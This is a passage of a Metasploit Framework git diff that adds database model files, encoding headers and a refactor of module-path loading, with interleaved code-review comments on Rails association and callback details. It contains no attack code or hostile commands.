+ has_many :platforms, :class_name => "Mdm::ModulePlatform", :dependent => :destroy, :source => :module_platform
+
+ validate :refname, :presence => true
+
+ validates_associated :authors
+ validates_associated :mixins
+ validates_associated :targets
+ validates_associated :actions
+ validates_associated :archs
+ validates_associated :platforms
+ validates_associated :refs
+
+ def add_author(name, email=nil)
+ if email
+ r = self.authors.build(:name => name, :email => email).save
+ else
+ self.authors.build(:name => name).save
+ end
+ end
+
+ def add_mixin(name)
+ self.mixins.build(:name => name).save
+ end
+
+ def add_target(idx, name)
+ self.targets.build(:index => idx, :name => name).save
+ end
+
+ def add_action(name)
+ self.actions.build(:name => name).save
+ end
+
+ def add_ref(name)
+ self.refs.build(:name => name).save
+ end
+
+ def add_arch(name)
+ self.archs.build(:name => name).save
+ end
+
+ def add_platform(name)
+ self.platforms.build(:name => name).save
+ end
+
+ def before_destroy
+ Mdm::ModuleAuthor.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleMixin.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleTarget.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleAction.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleRef.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleArch.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModulePlatform.delete_all('module_detail_id = ?', self.id)
+ end
+ }
+ end
+end
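Review bot: The `before_destroy` method calls `delete_all('module_detail_id = ?', self.id)` with two positional arguments. As far as I can tell `delete_all` takes a single conditions argument, so the placeholder form needs an array, `Mdm::ModuleAuthor.delete_all(['module_detail_id = ?', id])`. Whether a method merely named `before_destroy` runs as a callback depends on the ActiveRecord version in use; registering it with the macro, `before_destroy :delete_children`, removes that doubt. Every association above already declares `:dependent => :destroy`, so the hook duplicates that cleanup and could be dropped, or the associations switched to `:dependent => :delete_all` if skipping child callbacks is the intent. The `before_destroy` added to vuln.rb uses the same two-argument `delete_all` calls.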
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb
new file mode 100644
index 0000000000..8f0258d4a1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleMixin
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_mixins"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb
new file mode 100644
index 0000000000..9d484e42f8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModulePlatform
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_platforms"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb
new file mode 100644
index 0000000000..8bffa365a9
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleRef
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_refs"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb
new file mode 100644
index 0000000000..7e52b1a296
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleTarget
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_targets"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
index 259f60c958..e253bbbe1e 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
@@ -1,7 +1,8 @@
module MetasploitDataModels::ActiveRecordModels::Ref
def self.included(base)
base.class_eval{
- has_and_belongs_to_many :vulns, :join_table => :vulns_refs, :class_name => "Mdm::Vuln"
+ has_many :vulns, :through => :vulns_refs, :class_name => "Mdm::Vuln"
+ has_many :vulns_refs, :class_name => "Mdm::VulnRef"
}
end
end
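Review bot: The new `has_many :vulns_refs` carries no `:dependent` option, so destroying a Ref can leave `vulns_refs` rows pointing at a ref that no longer exists. The `has_and_belongs_to_many` it replaces cleared those join rows automatically. Suggest `has_many :vulns_refs, :class_name => "Mdm::VulnRef", :dependent => :delete_all`, declared ahead of the `:through` association so the dependency reads top-down. vuln.rb declares `vulns_refs` the same way and relies on its `before_destroy` method for the cleanup instead.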
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
index d55493f163..d1e9c408c1 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
@@ -3,7 +3,11 @@ module MetasploitDataModels::ActiveRecordModels::Vuln
base.class_eval {
belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :vuln_count
belongs_to :service, :class_name => "Mdm::Service", :foreign_key => :service_id
- has_and_belongs_to_many :refs, :join_table => :vulns_refs, :class_name => "Mdm::Ref"
+ has_many :vuln_details, :dependent => :destroy, :class_name => "Mdm::VulnDetail"
+ has_many :vuln_attempts, :dependent => :destroy, :class_name => "Mdm::VulnAttempt"
+ has_many :vulns_refs, :class_name => "Mdm::VulnRef"
+ has_many :refs, :through => :vulns_refs, :class_name => "Mdm::Ref"
+
validates :name, :presence => true
validates_associated :refs
@@ -22,6 +26,13 @@ module MetasploitDataModels::ActiveRecordModels::Vuln
def save_refs
refs.each { |ref| ref.save(:validate => false) }
end
+
+ def before_destroy
+ Mdm::VulnRef.delete_all('vuln_id = ?', self.id)
+ Mdm::VulnDetail.delete_all('vuln_id = ?', self.id)
+ Mdm::VulnAttempt.delete_all('vuln_id = ?', self.id)
+ end
+
}
end
end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
new file mode 100755
index 0000000000..46a73890a8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::VulnAttempt
+ def self.included(base)
+ base.class_eval {
+ belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_attempt_count
+ validates :vuln_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb
new file mode 100755
index 0000000000..d3655e79cb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::VulnDetail
+ def self.included(base)
+ base.class_eval {
+ belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_detail_count
+ validates :vuln_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb
new file mode 100644
index 0000000000..567ff44075
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb
@@ -0,0 +1,10 @@
+module MetasploitDataModels::ActiveRecordModels::VulnRef
+ def self.included(base)
+ base.class_eval {
+ base.table_name = "vulns_refs"
+ belongs_to :ref
+ belongs_to :vuln
+ }
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
index b69e324050..077ce55a67 100644
--- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
+++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
@@ -6,7 +6,7 @@ Gem::Specification.new do |s|
s.required_rubygems_version = Gem::Requirement.new("> 1.3.1") if s.respond_to? :required_rubygems_version=
s.authors = ["Trevor Rosen"]
- s.date = "2012-06-20"
+ s.date = "2012-06-25"
s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions."
s.email = ["trevor_rosen@rapid7.com"]
s.executables = ["mdm_console"]
diff --git a/lib/msf/base.rb b/lib/msf/base.rb
index 5257eeed38..5982de14cc 100644
--- a/lib/msf/base.rb
+++ b/lib/msf/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-base
diff --git a/lib/msf/base.rb.ts.rb b/lib/msf/base.rb.ts.rb
index d6d4c501c8..f3c7d92fa3 100644
--- a/lib/msf/base.rb.ts.rb
+++ b/lib/msf/base.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'msf/base'
diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb
index 2aa2df6c70..2d8c98acba 100644
--- a/lib/msf/base/config.rb
+++ b/lib/msf/base/config.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'fileutils'
module Msf
diff --git a/lib/msf/base/logging.rb b/lib/msf/base/logging.rb
index 7bfd109f27..7806a11c9e 100644
--- a/lib/msf/base/logging.rb
+++ b/lib/msf/base/logging.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
require 'msf/base'
diff --git a/lib/msf/base/persistent_storage.rb b/lib/msf/base/persistent_storage.rb
index 58ad42572d..e5b90a79bd 100644
--- a/lib/msf/base/persistent_storage.rb
+++ b/lib/msf/base/persistent_storage.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/base/persistent_storage/flatfile.rb b/lib/msf/base/persistent_storage/flatfile.rb
index 663d5d50cc..1cc68b6992 100644
--- a/lib/msf/base/persistent_storage/flatfile.rb
+++ b/lib/msf/base/persistent_storage/flatfile.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class PersistentStorage
diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb
index 50cc652a59..eca467119a 100644
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Serializer
diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb
index 61f97c7a0d..34f7465607 100644
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
require 'msf/base/sessions/scriptable'
require 'shellwords'
diff --git a/lib/msf/base/sessions/command_shell.rb.ut.rb b/lib/msf/base/sessions/command_shell.rb.ut.rb
index 7c45d33afa..365465a6c7 100644
--- a/lib/msf/base/sessions/command_shell.rb.ut.rb
+++ b/lib/msf/base/sessions/command_shell.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'msf/base'
diff --git a/lib/msf/base/sessions/command_shell_options.rb b/lib/msf/base/sessions/command_shell_options.rb
index c91db3d80f..028ce427ab 100644
--- a/lib/msf/base/sessions/command_shell_options.rb
+++ b/lib/msf/base/sessions/command_shell_options.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb
index dca3c2af92..211e52b4e1 100644
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index 1f9bc5e0ea..7f298bf408 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index c2a06e6d6a..fb467f39f4 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_php.rb b/lib/msf/base/sessions/meterpreter_php.rb
index 7890d2682d..90cd75b2e7 100644
--- a/lib/msf/base/sessions/meterpreter_php.rb
+++ b/lib/msf/base/sessions/meterpreter_php.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_x64_win.rb b/lib/msf/base/sessions/meterpreter_x64_win.rb
index 614ff31e59..84b56c9e69 100644
--- a/lib/msf/base/sessions/meterpreter_x64_win.rb
+++ b/lib/msf/base/sessions/meterpreter_x64_win.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: meterpreter_options.rb 10595 2010-10-08 04:11:47Z hdm $
##
diff --git a/lib/msf/base/sessions/meterpreter_x86_bsd.rb b/lib/msf/base/sessions/meterpreter_x86_bsd.rb
index d19c595009..fcb55d3788 100644
--- a/lib/msf/base/sessions/meterpreter_x86_bsd.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_bsd.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb
index 8b3c3cb5fb..df6029cf60 100644
--- a/lib/msf/base/sessions/meterpreter_x86_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_x86_win.rb b/lib/msf/base/sessions/meterpreter_x86_win.rb
index be696ad170..12a259a892 100644
--- a/lib/msf/base/sessions/meterpreter_x86_win.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_win.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb
index fabfe55fdc..971db7f78e 100644
--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf::Session
diff --git a/lib/msf/base/sessions/tty.rb b/lib/msf/base/sessions/tty.rb
index d7e9af8d66..cf8dddf2d6 100644
--- a/lib/msf/base/sessions/tty.rb
+++ b/lib/msf/base/sessions/tty.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/vncinject.rb b/lib/msf/base/sessions/vncinject.rb
index 24fb66dbdd..6f1eb18dcf 100644
--- a/lib/msf/base/sessions/vncinject.rb
+++ b/lib/msf/base/sessions/vncinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
require 'rex/services/local_relay'
diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb
index d7e5d67c46..1ae2954ceb 100644
--- a/lib/msf/base/sessions/vncinject_options.rb
+++ b/lib/msf/base/sessions/vncinject_options.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/simple.rb b/lib/msf/base/simple.rb
index 2a1e8cdc81..e9985164bf 100644
--- a/lib/msf/base/simple.rb
+++ b/lib/msf/base/simple.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Buffer management
require 'msf/base/simple/buffer'
require 'msf/base/simple/statistics'
diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb
index 9815358120..1eada62e93 100644
--- a/lib/msf/base/simple/auxiliary.rb
+++ b/lib/msf/base/simple/auxiliary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb
index e1d887ca86..3f4992c071 100644
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/simple/encoder.rb b/lib/msf/base/simple/encoder.rb
index 4ec756cc69..961ca69a0c 100644
--- a/lib/msf/base/simple/encoder.rb
+++ b/lib/msf/base/simple/encoder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb
index 018029cbea..adf2f781e7 100644
--- a/lib/msf/base/simple/exploit.rb
+++ b/lib/msf/base/simple/exploit.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb
index b9d3fde778..216b97e1fe 100644
--- a/lib/msf/base/simple/framework.rb
+++ b/lib/msf/base/simple/framework.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base/simple'
module Msf
@@ -102,33 +103,14 @@ module Framework
# Load the configuration
framework.load_config
- # Set the file that will be used to cache information about modules for
- # the purpose of providing demand-loaded modules.
- framework.modules.set_module_cache_file(
- File.join(Msf::Config.config_directory, 'modcache'))
-
- # Initialize the default module search paths
- if (Msf::Config.module_directory)
- framework.modules.add_module_path(Msf::Config.module_directory)
- end
-
- # Initialize the user module search path
- if (Msf::Config.user_module_directory)
- framework.modules.add_module_path(Msf::Config.user_module_directory)
- end
-
- # If additional module paths have been defined globally, then load them.
- # They should be separated by semi-colons.
- if framework.datastore['MsfModulePaths']
- framework.datastore['MsfModulePaths'].split(";").each { |path|
- framework.modules.add_module_path(path)
- }
- end
-
# Register the framework as its own general event subscriber in this
# instance
framework.events.add_general_subscriber(framework)
+ unless opts['DeferModuleLoads']
+ framework.init_module_paths
+ end
+
return framework
end
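Review bot: The new `opts['DeferModuleLoads']` switch is undocumented, and a caller that sets it gets back a framework with no module search paths until it calls `init_module_paths` itself. A comment above the check would make that contract visible, for example `# Callers passing 'DeferModuleLoads' must call framework.init_module_paths before using framework.modules`. The key is looked up as a string, so a symbol key would presumably be ignored and loading would go ahead; the comment should state the expected key form. The enclosing method begins outside this hunk, so its existing option documentation, if any, is not visible here.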
@@ -145,6 +127,7 @@ module Framework
end
end
+
##
#
# Simplified interface
@@ -172,11 +155,51 @@ module Framework
self.datastore.to_file(Msf::Config.config_file, 'framework/core')
end
+ #
+ # Initialize the module paths
+ #
+ def init_module_paths
+
+ # Ensure the module cache is accurate
+ self.modules.refresh_cache
+
+ # Initialize the default module search paths
+ if (Msf::Config.module_directory)
+ self.modules.add_module_path(Msf::Config.module_directory)
+ end
+
+ # Initialize the user module search path
+ if (Msf::Config.user_module_directory)
+ self.modules.add_module_path(Msf::Config.user_module_directory)
+ end
+
+ # If additional module paths have been defined globally, then load them.
+ # They should be separated by semi-colons.
+ if self.datastore['MsfModulePaths']
+ self.datastore['MsfModulePaths'].split(";").each { |path|
+ self.modules.add_module_path(path)
+ }
+ end
+ end
+
#
# Statistics.
#
attr_reader :stats
+ #
+ # Boolean indicating whether the cache is initialized yet
+ #
+ attr_reader :cache_initialized
+
+ #
+ # Thread of the running rebuild operation
+ #
+ attr_reader :cache_thread
+ attr_writer :cache_initialized # :nodoc:
+ attr_writer :cache_thread # :nodoc:
+
+
protected
attr_writer :stats # :nodoc:
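Review bot: `init_module_paths` has no guard against running twice, so a deferred caller and a non-deferred one can both refresh the cache and add the same paths again. A flag checked at the top, such as `return if @module_paths_initialized` followed by setting it, would make repeat calls harmless. `MsfModulePaths` is split on `;` and each piece goes to `add_module_path` as is, so an empty entry from a doubled separator passes through; `split(";").reject { |p| p.strip.empty? }` would drop those. The directories added here are presumably loaded as module code, so a comment saying these paths must come from operator-controlled configuration would help the next reader. The writers for `cache_initialized` and `cache_thread` sit above `protected` and are therefore public, unlike the `stats` writer; if that is deliberate a short comment saying who sets them would be useful.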
diff --git a/lib/msf/base/simple/module.rb b/lib/msf/base/simple/module.rb
index 396d9d99c5..7913a8bd11 100644
--- a/lib/msf/base/simple/module.rb
+++ b/lib/msf/base/simple/module.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/base/simple/nop.rb b/lib/msf/base/simple/nop.rb
index 4e1d3974f8..c73401c1b4 100644
--- a/lib/msf/base/simple/nop.rb
+++ b/lib/msf/base/simple/nop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb
index 00d75e4bd5..7f6cae11dd 100644
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/simple/post.rb b/lib/msf/base/simple/post.rb
index 678c95bf5f..65004ed04f 100644
--- a/lib/msf/base/simple/post.rb
+++ b/lib/msf/base/simple/post.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/base/simple/statistics.rb b/lib/msf/base/simple/statistics.rb
index 9d2d2974d6..579e9a3613 100644
--- a/lib/msf/base/simple/statistics.rb
+++ b/lib/msf/base/simple/statistics.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/core.rb b/lib/msf/core.rb
index 2117e6ab11..64cc36454c 100644
--- a/lib/msf/core.rb
+++ b/lib/msf/core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-core
diff --git a/lib/msf/core.rb.ts.rb b/lib/msf/core.rb.ts.rb
index b1e7c0344e..bd50d7cea6 100644
--- a/lib/msf/core.rb.ts.rb
+++ b/lib/msf/core.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'msf/core'
diff --git a/lib/msf/core/auxiliary.rb b/lib/msf/core/auxiliary.rb
index 1eb979c429..571efef878 100644
--- a/lib/msf/core/auxiliary.rb
+++ b/lib/msf/core/auxiliary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/module'
module Msf
diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb
index d4cc364ecc..b82b6d8e3c 100644
--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/cisco.rb b/lib/msf/core/auxiliary/cisco.rb
index 073290ec24..92aa947a1f 100644
--- a/lib/msf/core/auxiliary/cisco.rb
+++ b/lib/msf/core/auxiliary/cisco.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/commandshell.rb b/lib/msf/core/auxiliary/commandshell.rb
index e46af76a88..d4c91a454d 100644
--- a/lib/msf/core/auxiliary/commandshell.rb
+++ b/lib/msf/core/auxiliary/commandshell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb
index b3ccd8e513..c530ee266f 100644
--- a/lib/msf/core/auxiliary/crawler.rb
+++ b/lib/msf/core/auxiliary/crawler.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/dos.rb b/lib/msf/core/auxiliary/dos.rb
index 267547b1f2..c0e8dfbb46 100644
--- a/lib/msf/core/auxiliary/dos.rb
+++ b/lib/msf/core/auxiliary/dos.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/fuzzer.rb b/lib/msf/core/auxiliary/fuzzer.rb
index 6ee83f8c6a..2e569dc8c7 100644
--- a/lib/msf/core/auxiliary/fuzzer.rb
+++ b/lib/msf/core/auxiliary/fuzzer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/iax2.rb b/lib/msf/core/auxiliary/iax2.rb
index 538cacd098..181e5948bf 100644
--- a/lib/msf/core/auxiliary/iax2.rb
+++ b/lib/msf/core/auxiliary/iax2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/client'
module Msf
diff --git a/lib/msf/core/auxiliary/jtr.rb b/lib/msf/core/auxiliary/jtr.rb
index 8fa4c3d611..8dbba2cc05 100644
--- a/lib/msf/core/auxiliary/jtr.rb
+++ b/lib/msf/core/auxiliary/jtr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'open3'
require 'fileutils'
require 'rex/proto/ntlm/crypt'
diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb
index 6142998f01..816604a95b 100644
--- a/lib/msf/core/auxiliary/login.rb
+++ b/lib/msf/core/auxiliary/login.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/mime_types.rb b/lib/msf/core/auxiliary/mime_types.rb
index eff5a6b87f..ca19afd693 100644
--- a/lib/msf/core/auxiliary/mime_types.rb
+++ b/lib/msf/core/auxiliary/mime_types.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'action_dispatch/http/mime_type'
module Msf
diff --git a/lib/msf/core/auxiliary/mixins.rb b/lib/msf/core/auxiliary/mixins.rb
index f866facb0e..0274845b69 100644
--- a/lib/msf/core/auxiliary/mixins.rb
+++ b/lib/msf/core/auxiliary/mixins.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb
index 6051d8d1b5..2f40def8b5 100644
--- a/lib/msf/core/auxiliary/nmap.rb
+++ b/lib/msf/core/auxiliary/nmap.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/parser/nmap_nokogiri'
require 'rex/parser/nmap_xml'
require 'open3'
diff --git a/lib/msf/core/auxiliary/pii.rb b/lib/msf/core/auxiliary/pii.rb
index 8be7644ff7..3630f08835 100644
--- a/lib/msf/core/auxiliary/pii.rb
+++ b/lib/msf/core/auxiliary/pii.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
# $Id$
###
diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index bb7f961213..057d03e537 100644
--- a/lib/msf/core/auxiliary/report.rb
